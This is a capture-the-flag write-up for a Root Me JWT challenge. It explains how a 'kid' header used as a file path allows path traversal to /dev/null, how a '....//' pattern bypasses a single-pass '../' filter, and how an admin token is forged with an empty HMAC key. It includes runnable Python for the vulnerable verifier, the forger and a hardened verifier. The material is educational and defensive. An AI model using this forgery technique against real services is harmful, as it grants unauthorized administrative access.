Jwt - Unsecure File Signature
NOTE

Description: A previous Root Me administrator is trying to replicate the website after being banned for sharing challenge solutions. Try to find out if he is hiding any other flags on his new website.

Web-View

web-view

I found it hard to work out where the buttons on this website actually lead.

Inspecting the page's source code, I found a few endpoints that looked worth a closer look:

/admin
static/challs/htmllecture.html
static/challs/irc.html
static/challs/obfu6.html
static/https://www.youtube.com/watch?v=ZYrmrflWBmY
static/challs/samboxv5.html

/admin

Requesting the admin endpoint at http://challenge01.root-me.org:59081/admin returns an "Unauthorized" error:

{"Unauthorized":"You are not admin !"}

burp

I intercepted the request in Burp to see what the server actually checks.

Burp-request

The request carries a JWT (JSON Web Token).

To understand its structure I pasted it into jwt.io, which decodes the header and payload and shows how the signature is computed.

JWT.IO

jwt-io

Decoding the token shows that it is signed with HS256 (HMAC-SHA256) and that its header carries a "kid" (Key ID) parameter.

"kid" is a JOSE header parameter, not a claim: it tells the server which key to use when verifying the signature. When the server turns that value into a file path to load the signing secret, the header becomes attacker-controlled input to a filesystem read, which is exactly what this challenge is about.

If you’re interested in delving deeper into attacks involving the “kid” parameter in JWTs, you can find more information here: kid-parameter

I then tried the usual attacks on the "kid" header: signing with guessed secrets, and SQL and OS-command injection through the header value. What worked was path traversal: the server uses "kid" as the path of the file holding the HMAC secret, so pointing it at /dev/null makes the secret an empty string, and the forged token can then be signed with an empty key.

empty-sign

path-traversal

One complication: the server strips "../" sequences from the value (a single-pass replace or similar), so a plain ../../../dev/null is reduced to dev/null and never reaches the file.

Because the filter runs only once, the pattern ....// survives it as ../ (removing the inner ../ leaves the outer ../ behind), so a "kid" of ....//....//....//dev/null still resolves to /dev/null after filtering.
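The whole chain, as an added, self-contained example that is not part of the original writeup and not the challenge's real code: a minimal HS256 signer, a verifier that models the vulnerable behaviour described above (the "kid" header is used as a file path after a single-pass "../" filter), the forged admin token signed with an empty key, and a hardened verifier that treats "kid" as an opaque allow-list name. The key directory, the server secret and the `{"username": "admin"}` claim are all constructed assumptions; the challenge's real payload is not shown on the page.

```python
import base64
import hashlib
import hmac
import json
import os
import tempfile
from typing import Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Build a compact JWS (JWT) signed with HMAC-SHA256 under `key`."""
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


# Constructed stand-in for the server's key directory and secret (assumption).
KEY_DIR = tempfile.mkdtemp()
SERVER_SECRET = b"real-server-secret-the-attacker-never-learns"
with open(os.path.join(KEY_DIR, "secret.key"), "wb") as fh:
    fh.write(SERVER_SECRET)


def load_key_vulnerable(kid: str) -> bytes:
    """Vulnerable lookup: 'kid' is used as a file path after a single-pass '../' filter."""
    kid = kid.replace("../", "")            # runs once, so "....//" collapses to "../"
    with open(os.path.join(KEY_DIR, kid), "rb") as fh:
        return fh.read()                    # /dev/null reads as b"" -> empty HMAC key


ALLOWED_KEYS = {"secret.key": SERVER_SECRET}


def load_key_hardened(kid: str) -> bytes:
    """Hardened lookup: 'kid' is an opaque name looked up in an allow-list, never a path."""
    return ALLOWED_KEYS[kid]                # unknown kid -> KeyError -> token rejected


def _verify(token: str, load_key) -> Optional[dict]:
    try:
        h_b64, p_b64, s_b64 = token.split(".")
        header = json.loads(b64url_decode(h_b64))
        if header.get("alg") != "HS256":    # pin the algorithm; also blocks alg=none
            return None
        key = load_key(header["kid"])
    except (ValueError, KeyError, OSError):
        return None
    expected = hmac.new(key, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s_b64)):
        return None
    return json.loads(b64url_decode(p_b64))


def verify_vulnerable(token: str) -> Optional[dict]:
    return _verify(token, load_key_vulnerable)


def verify_hardened(token: str) -> Optional[dict]:
    return _verify(token, load_key_hardened)


ADMIN_CLAIMS = {"username": "admin"}    # assumed claim shape; the real payload is not shown


def forge_admin_token(kid: str) -> str:
    """Attacker side: sign an admin payload with an EMPTY key, relying on kid -> /dev/null."""
    return sign_hs256({"alg": "HS256", "typ": "JWT", "kid": kid}, ADMIN_CLAIMS, b"")


NAIVE_KID = "../" * 8 + "dev/null"      # fully stripped by the filter: file not found
BYPASS_KID = "....//" * 8 + "dev/null"  # survives one replace() pass as "../" * 8 + "dev/null"

if __name__ == "__main__":
    print("naive traversal :", verify_vulnerable(forge_admin_token(NAIVE_KID)))
    print("....// bypass   :", verify_vulnerable(forge_admin_token(BYPASS_KID)))
    print("hardened server :", verify_hardened(forge_admin_token(BYPASS_KID)))
```

The number of ....// repetitions only has to be large enough to climb out of the key directory; on POSIX, .. of the root directory is the root, so extra levels are harmless. The fix that matters is in `load_key_hardened`: a key identifier must never be joined into a path, and the algorithm should be pinned server-side rather than taken from the token header.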

final_sol

With that "kid" value and an empty signing key, the server accepts the forged token and returns the flag.

flag

Have fun 💜